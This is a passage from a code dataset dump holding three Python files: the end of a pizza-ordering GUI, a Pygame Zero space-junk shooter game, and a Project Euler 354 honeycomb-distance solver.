\"+(PizzaOrder[1][0])))\r\n OrderText2.config(text=((PizzaOrder[0][1])+\" \"+(PizzaOrder[1][1])))\r\n OrderText3.config(text=(\"\"))\r\n elif ((len(PizzaOrder[0]))==3):\r\n OrderText1.config(text=((PizzaOrder[0][0])+\" \"+(PizzaOrder[1][0])))\r\n OrderText2.config(text=((PizzaOrder[0][1])+\" \"+(PizzaOrder[1][1])))\r\n OrderText3.config(text=((PizzaOrder[0][2])+\" \"+(PizzaOrder[1][2])))\r\n OrderText4.config(text=(\"\"))\r\n elif ((len(PizzaOrder[0]))==4):\r\n OrderText1.config(text=((PizzaOrder[0][0])+\" \"+(PizzaOrder[1][0])))\r\n OrderText2.config(text=((PizzaOrder[0][1])+\" \"+(PizzaOrder[1][1])))\r\n OrderText3.config(text=((PizzaOrder[0][2])+\" \"+(PizzaOrder[1][2])))\r\n OrderText4.config(text=((PizzaOrder[0][3])+\" \"+(PizzaOrder[1][3])))\r\n OrderText5.config(text=(\"\"))\r\n else:\r\n print(\"Error in logic 1\")\r\n return\r\nPizzaData = RetInfo()\r\nCustPage(PizzaData)\r\n","sub_path":"V1.7.py","file_name":"V1.7.py","file_ext":"py","file_size_in_byte":14121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"527844804","text":"# Intro to GameDev - main game file\nimport pgzrun\nimport random\n\nWIDTH = 1000\nHEIGHT = 600\n\nSCOREBOX_HEIGHT = 60\n\n#keep track of score\nscore = 0\njunk_collect = 0\nlevel = 0\nlevel_screen = 0\nlvl2_LIMIT = 5\nlvl3_LIMIT = 10\n\n#sprite speeds\nJUNK_SPEED = 5\nSATELLITE_SPEED = 3\nDEBRIS_SPEED = 3\nLASER_SPEED = -5 # lasers are moving towards the left on screen\n\nBACKGROUND_IMG = \"background_logo\"\nPLAYER_IMG = \"player\"\nJUNK_IMG = \"space_junk\"\nSATELLITE_IMG = \"satellite_adv\"\nDEBRIS_IMG = \"space_debris2\"\nLASER_IMG = \"laser_red\"\nSTART_IMG = \"start_button\"\nINSTRUCTIONS_IMG = \"instructions_button\"\n\ndef init():\n global player, junks, lasers, satellite, debris\n player = Actor(PLAYER_IMG)\n player.midright = (WIDTH - 15, HEIGHT/2)\n\n # initialize junk sprites\n junks = [] # list to keep track of junks\n for i in range(5):\n junk = Actor(JUNK_IMG) # create a junk sprite\n x_pos = random.randint(-500, -50)\n y_pos = random.randint(SCOREBOX_HEIGHT, HEIGHT - junk.height)\n junk.topright = (x_pos, y_pos) # rect_position = (x, y)\n junks.append(junk)\n\n # initialize lasers\n lasers = []\n player.laserActive = 1\n\n # initialize satellite\n satellite = Actor(SATELLITE_IMG) # create sprite\n x_sat = random.randint(-500, -50)\n y_sat = random.randint(SCOREBOX_HEIGHT, HEIGHT - satellite.height)\n satellite.topright = (x_sat, y_sat) # rect_position\n\n # initialize debris\n debris = Actor(DEBRIS_IMG)\n x_deb = random.randint(-500, -50)\n y_deb = random.randint(SCOREBOX_HEIGHT, HEIGHT - debris.height)\n debris.topright = (x_deb, y_deb)\n\n # background music\n music.play(\"spacelife\")\n\n# initialize title screen buttons\nstart_button = Actor(START_IMG)\nstart_button.center = (WIDTH/2, 425)\ninstructions_button = Actor(INSTRUCTIONS_IMG)\ninstructions_button.center = (WIDTH/2, 500)\n\ndef on_mouse_down(pos):\n global level, level_screen\n if start_button.collidepoint(pos):\n level = 1\n level_screen = 1\n print(\"start button pressed!\")\n if instructions_button.collidepoint(pos):\n level = -1\n print(\"instructions button pressed!\")\n \n# game loop\ninit()\n\ndef update():\n global score, junk_collect, level, level_screen, BACKGROUND_IMG\n if junk_collect == lvl2_LIMIT: # level 2\n level = 2\n if junk_collect == lvl3_LIMIT: # level 3\n level = 3\n if level == -1: # instructions screen\n BACKGROUND_IMG = \"background_level1\"\n\n if score >= 0 and level >= 1:\n if level_screen == 1: # level 1 title screen\n BACKGROUND_IMG = \"background_level1\"\n if keyboard.RETURN == 1:\n level_screen = 2\n if level_screen == 2: # level 1 gameplay\n updatePlayer() # calling our player update function\n updateJunk() # calling junk update function\n if level == 2 and level_screen <= 3: # level 2 title\n BACKGROUND_IMG = \"background_level2\"\n level_screen = 3\n if keyboard.RETURN == 1:\n level_screen = 4\n if level_screen == 4: # level 2 gameplay\n updatePlayer()\n updateJunk()\n updateSatellite()\n if level == 3 and level_screen <= 5: # level 3 title\n level_screen = 5\n BACKGROUND_IMG = \"background_level3\"\n if keyboard.RETURN == 1:\n level_screen = 6\n if level_screen == 6: # level 3 game play\n updatePlayer()\n updateJunk()\n updateSatellite()\n updateDebris()\n updateLasers()\n\n if score < 0 or level == -2: # game over or end game\n if keyboard.RETURN == 1:\n BACKGROUND_IMG = \"background_logo\"\n score = 0\n junk_collect = 0\n level = 0\n init()\n \ndef draw():\n screen.clear()\n screen.blit(BACKGROUND_IMG, (0,0))\n if level == -1:\n start_button.draw()\n show_instructions = \"Use UP and DOWN arrow keys to move your player\\n\\npress SPACEBAR to shoot\"\n screen.draw.text(show_instructions, midtop=(WIDTH/2, 70), fontsize=35, color=\"white\")\n if level == 0:\n start_button.draw()\n instructions_button.draw()\n if level >= 1:\n player.draw() # draw player sprite on screen\n for junk in junks:\n junk.draw() # draw junk sprite on screen\n if level >= 2:\n satellite.draw()\n if level == 3:\n debris.draw()\n for laser in lasers:\n laser.draw()\n \n # game over screen\n if score < 0:\n game_over = \"GAME OVER\\npress ENTER to play again\"\n screen.draw.text(game_over, center=(WIDTH / 2, HEIGHT / 2), fontsize=60, color=\"white\")\n\n #draw some text on the screen\n show_score = \"Score: \" + str(score) # remember to convert score to a string\n screen.draw.text(show_score, topleft=(650, 15), fontsize=35, color=\"white\")\n show_collect_value = \"Junk: \" + str(junk_collect)\n screen.draw.text(show_collect_value, topleft=(450, 15), fontsize=35, color=\"white\")\n \n if level >= 1:\n show_level = \"LEVEL \" + str(level)\n screen.draw.text(show_level, topright=(375, 15), fontsize=35, color=\"white\")\n\n if level_screen == 1 or level_screen == 3 or level_screen == 5:\n show_level_title = \"LEVEL \" + str(level) + \"\\nPress ENTER to continue...\"\n screen.draw.text(show_level_title, center=(WIDTH/2, HEIGHT/2), fontsize=70, color=\"white\")\n\n# make separate functions for each of our sprites\ndef updatePlayer():\n # check for user input\n if keyboard.up == 1:\n player.y += -5 # moving up is in negative y direction\n elif keyboard.down == 1:\n player.y += 5 # moving down is in the postive y direction\n\n # prevent player from moving off screen\n if player.top < 0:\n player.top = 0\n if player.bottom > HEIGHT:\n player.bottom = HEIGHT\n\n #check for firing lasers\n if keyboard.space == 1 and level == 3:\n laser = Actor(LASER_IMG)\n laser.midright = (player.midleft)\n fireLasers(laser) # this is a function from the template code\n\ndef updateJunk():\n global score, junk_collect\n for junk in junks:\n junk.x += JUNK_SPEED\n\n collision = player.colliderect(junk)\n if junk.left > WIDTH or collision == 1:\n x_pos = random.randint(-500, -50)\n y_pos = random.randint(SCOREBOX_HEIGHT, HEIGHT - junk.height)\n junk.topleft = (x_pos, y_pos)\n \n # collisions between player and junk\n if collision:\n score += 1 # update the score\n junk_collect += 1\n\ndef updateSatellite():\n global score\n satellite.x += SATELLITE_SPEED # or just put 3\n\n collision = player.colliderect(satellite)\n if satellite.left > WIDTH or collision == 1:\n x_sat = random.randint(-500, -50)\n y_sat = random.randint(SCOREBOX_HEIGHT, HEIGHT - satellite.height)\n satellite.topright = (x_sat, y_sat)\n\n if collision == 1:\n score += -10\n\ndef updateDebris():\n global score\n debris.x += DEBRIS_SPEED # or just put 3\n\n collision = player.colliderect(debris)\n if debris.left > WIDTH or collision == 1:\n x_deb = random.randint(-500, -50)\n y_deb = random.randint(SCOREBOX_HEIGHT, HEIGHT - debris.height)\n debris.topright = (x_deb, y_deb)\n\n if collision == 1:\n score += -10\n\n\ndef updateLasers():\n global score\n for laser in lasers:\n laser.x += LASER_SPEED\n # remove laser if moves off screen\n if laser.right < 0:\n lasers.remove(laser)\n #check for collisions\n if satellite.colliderect(laser) == 1:\n lasers.remove(laser)\n x_sat = random.randint(-500, -50)\n y_sat = random.randint(SCOREBOX_HEIGHT, HEIGHT - satellite.height)\n satellite.topright = (x_sat, y_sat)\n score += - 5 # decrease the score\n if debris.colliderect(laser) == 1:\n lasers.remove(laser)\n x_deb = random.randint(-500, -50)\n y_deb = random.randint(SCOREBOX_HEIGHT, HEIGHT - debris.height)\n debris.topright = (x_deb, y_deb)\n score += 5 # increase the score\n \n# activating lasers (template code)____________________________________\nplayer.laserActive = 1 # add laserActive status to the player\n\ndef makeLaserActive(): # when called, this function will make lasers active again\n global player\n player.laserActive = 1\n\ndef fireLasers(laser):\n if player.laserActive == 1: # active status is used to prevent continuous shoot when holding space key\n player.laserActive = 0\n clock.schedule(makeLaserActive, 0.2) # schedule an event (function, time afterwhich event will occur)\n sounds.laserfire02.play() # play sound effect\n lasers.append(laser) # add laser to lasers list\n \npgzrun.go()\n\n\n\n\n\n\n","sub_path":"my_space_game.py","file_name":"my_space_game.py","file_ext":"py","file_size_in_byte":8890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"351135134","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n\nPE_0354\n\nDistances in a bee's honeycomb\n\nSee p233\n\n58065134\n\nCreated on Fri Oct 13 09:41:49 2017\n\n@author: mbh\n\"\"\"\n\nimport time\nimport numpy as np\n\ndef p354(limit):\n t=time.perf_counter()\n \n limit=int(limit)\n \n ps=candidates1(limit)+candidates2(limit)+candidates3(limit) \n \n# psa=np.array(ps)\n \n print(time.perf_counter()-t)\n\n# ns=[]\n# \n# lLog=np.log(limit)\n# log3root=np.log(3**0.5) \n# mults=(lLog-np.log(psa))//log3root \n# print('mults:',len(mults),sum(mults)) \n# print(time.clock()-t)\n# \n# return mults\n \n ns=[]\n \n for p in ps:\n p*=3**0.5\n while p<=limit: \n ns.append(p)\n p*=3**0.5\n \n print('ns:',time.perf_counter()-t)\n \n print(len(ns),min(ns),limit//min(ns))\n \n qgood=[p for p in notPrime3k1Factor(np.int64(limit/min(ns)))] \n \n print(time.perf_counter()-t)\n \n nfinal=[]\n# count=0\n# lLog=np.log(limit)\n# qLogs=[np.log(q) for q in qgood]\n# \n# print(time.clock()-t)\n# \n# for n in ns:\n# for ql in qLogs:\n# k=(lLog-np.log(3**0.5*n))//ql\n# total=(k+1)*sumFrac(min(m,k+1))\n\n for n in ns:\n for q in qgood:\n nq=n*q\n if nq>limit:\n break\n nfinal.append(nq)\n \n print ('nfinal',len(nfinal))\n print(time.perf_counter()-t)\n \n # return nfinal\n\n#case p1^2.p2^7 where p are primes=1 mod 3.\ndef candidates1(limit):\n\n p1lim=int((limit/7**7)**0.5)\n p2lim=int((limit/7**2)**(1/7))\n pfs=primeSieve(max(p1lim,p2lim))\n pfs=pfs[pfs%3==1]\n p1s=[int(p) for p in pfs[pfs<=p1lim]]\n p2s=[int(p) for p in pfs[pfs<=p2lim]] \n ps=[]\n for p1 in p1s:\n for p2 in p2s:\n if p2==p1:\n continue\n pprod=pow(p1,2)*pow(p2,7)\n if pprod<=limit:\n ps.append(pprod)\n return ps\n\n#case p1.7^12 where p is prime=1 mod 3.\ndef candidates2(limit):\n\n ps=[]\n plim=int(limit/7**12)\n pfs=[int(p) for p in primeSieve(plim) if p%3==1] \n for p in pfs[1:]:\n pprod=7**12*p\n if pprod<=limit:\n ps.append(pprod)\n return ps\n\n\n#case p1.p2^2.p3^2, p are prime=1 mod 3 \ndef candidates3(limit):\n\n ps=[]\n p1lim=int((limit/(7**2*13**2)))\n p23lim=int((limit/(7**2*13))**(1/2))\n pfs=primeSieve(max([p1lim,p23lim]))\n pfs=pfs[pfs%3==1]\n p1s=[int(p) for p in pfs[pfs<=p1lim]]\n p23s=[int(p) for p in pfs[pfs<=p23lim]]\n for p1 in p1s:\n p2lim=(limit/(p1*7**2))**(1/2)\n for p2 in p23s:\n if p2==p1:\n continue\n if p2>p2lim:\n break\n p3lim=(limit/(p1*p2**2))**(1/2)\n for p3 in p23s:\n if p3<=p2 or p3==p1:\n continue\n if p3>p3lim:\n break\n pprod=p1*p2**2*p3**2\n if pprod<=limit:\n ps.append(pprod)\n return ps \n\ndef primeSieve(n):\n \"\"\"return array of primes 2<=p<=n\"\"\"\n sieve=np.ones(n+1,dtype=np.bool)\n for i in range(2, int((n+1)**0.5+1)):\n if sieve[i]:\n sieve[2*i::i]=False\n return np.nonzero(sieve)[0][2:]\n\ndef notPrime3k1Factor(n):\n \"\"\"return array of numbers not divisible by 3 or primes p = 1 mod 3\"\"\"\n sieve=np.ones(n+1,dtype=np.bool)\n ps=primeSieve(n)\n ps=ps[ps%3==1]\n for i in ps:\n if sieve[i]:\n sieve[i::i]=False\n ps= np.nonzero(sieve)[0] \n return ps[ps%3!=0].astype(np.int64)\n\ndef sumFrac(k,nMax):\n sums={1:1}\n for n in range(2,nMax+1):\n sums[n]=sums[n-1]+k//n\n return sums","sub_path":"PE_0354/PE_0354.py","file_name":"PE_0354.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}